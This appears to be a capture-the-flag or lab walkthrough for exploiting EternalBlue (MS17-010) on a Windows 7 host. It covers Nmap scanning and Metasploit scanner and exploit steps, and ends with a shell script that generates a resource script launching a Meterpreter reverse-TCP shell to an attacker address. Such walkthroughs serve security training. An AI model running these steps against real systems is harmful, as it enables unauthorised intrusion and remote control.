First Step: Nmap scan for open ports, running services and OS details

nmap -p- -A -T4 <ip target>

-p-: Scan all 65535 TCP ports on the target instead of Nmap's default top-1000 list. The trailing hyphen is the "all ports" range; without it a service on an unusual port is easy to miss.

-A: Enable the "aggressive" feature set: OS detection (-O), service version detection (-sV), default NSE script scanning (-sC) and traceroute (--traceroute). It is simply shorthand for those options, which are commonly used together.

-T4: Use the "aggressive" timing template, so Nmap sends probes faster and waits less than with the default (-T3). This speeds the scan up considerably, but it assumes a fast, reliable network; on a slow or lossy link it can miss open ports or return incomplete version results.

Nmap Result:

The scan identifies the target's operating system as Windows 7 Ultimate 7601 Service Pack 1 (this string is reported by the SMB service on port 445, which is also the service we will attack).

To find out whether this build is vulnerable, search for it by name, e.g. a Google query like: Windows 7 Ultimate 7601 Service Pack 1 exploit

The results point to EternalBlue (MS17-010), so we move to Metasploit and look it up in msfconsole with the search command (search eternalblue), as shown in the image.

The search returns both an auxiliary scanner module and the exploit module. Let's run the scanner first and see what it reports.

<aside> 💡 IMPORTANT NOTE! Auxiliary modules do not attack the target. They only scan it and report what they find (here: whether the host looks vulnerable to MS17-010), so nothing is exploited at this step.

</aside>

Let's continue. Set RHOSTS to the victim machine's address and run the scanner; its output tells us whether the host is vulnerable, as shown in this result.

Now switch to the exploit module: use exploit/windows/smb/ms17_010_eternalblue, and set RHOSTS to the victim again.

Then choose the payload with set payload windows/x64/meterpreter/reverse_tcp. Because this is a reverse payload, check that LHOST is the address of your own attacking interface (the VPN interface if the lab is reached over a VPN), otherwise the exploit may succeed but the shell will never connect back. Then RUN!

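The whole procedure above (scan, read the OS string off the SMB service, confirm with the auxiliary scanner, then exploit) can be scripted so the scanner always runs before the exploit. The following POSIX shell script is an added example and is not part of the original writeup: it parses a saved nmap -p- -A result, checks the two indicators the writeup relies on (445/tcp open and a Windows 7 OS string), and emits a Metasploit resource script. The nmap output embedded below is a constructed, abbreviated sample, and 10.10.10.10 / 10.8.0.2 are placeholder target and attacker addresses, not values from the page.

```shell
#!/bin/sh
# Added example, not code from the original writeup.
# Triage a saved "nmap -p- -A" result for the MS17-010 indicators used in the
# writeup, then emit a Metasploit resource script that runs the auxiliary
# scanner before launching the exploit.
# Constructed sample: abbreviated nmap output for a placeholder target.
SAMPLE_NMAP_OUTPUT='Nmap scan report for 10.10.10.10
Host is up (0.040s latency).
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Host script results:
| smb-os-discovery:
|   OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
|   Computer name: WIN7-LAB
|_  System time: 2024-01-01T12:00:00-05:00'

# Print the open TCP ports from the scan output, one per line.
open_ports() {
    printf '%s\n' "$1" | awk '$1 ~ /^[0-9]+\/tcp$/ && $2 == "open" { sub(/\/tcp$/, "", $1); print $1 }'
}

# Exit 0 if the given TCP port is open in the scan output.
port_open() {
    open_ports "$1" | grep -qx "$2"
}

# Pull the OS string reported by the smb-os-discovery NSE script.
smb_os() {
    printf '%s\n' "$1" | sed -n 's/^|   OS: \(.*\) (.*)$/\1/p' | head -n 1
}

# Worth running the MS17-010 scanner against: SMB reachable on 445/tcp and an
# OS string matching the writeup's target family.
ms17_010_candidate() {
    port_open "$1" 445 || return 1
    case "$(smb_os "$1")" in
        *"Windows 7"*|*"Server 2008"*) return 0 ;;
        *) return 1 ;;
    esac
}

# Emit a Metasploit resource script: confirm with the auxiliary scanner first,
# then launch the exploit with the payload the writeup uses.
# Arguments: target address, attacker (LHOST) address, optional LPORT.
msf_rc() {
    target="$1"; lhost="$2"; lport="${3:-4444}"
    cat <<EOF
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS $target
run
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $target
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
exploit
EOF
}

# Stand-alone run against the constructed sample. For a real scan, save it with
#   nmap -p- -A -T4 -oN scan.txt 10.10.10.10
# and pass "$(cat scan.txt)" instead of "$SAMPLE_NMAP_OUTPUT".
if ms17_010_candidate "$SAMPLE_NMAP_OUTPUT"; then
    echo "# $(smb_os "$SAMPLE_NMAP_OUTPUT") with 445/tcp open: checking MS17-010"
    msf_rc 10.10.10.10 10.8.0.2
else
    echo "# no MS17-010 indicators in scan output"
fi
```

Redirect the output to a file and load it with msfconsole -q -r ms17_010.rc. Keeping the scanner module in front of the exploit in the same script is the point: the auxiliary check is harmless, while the EternalBlue exploit can crash an unpatched or mis-identified host, so you want the confirmation before the exploit line ever runs.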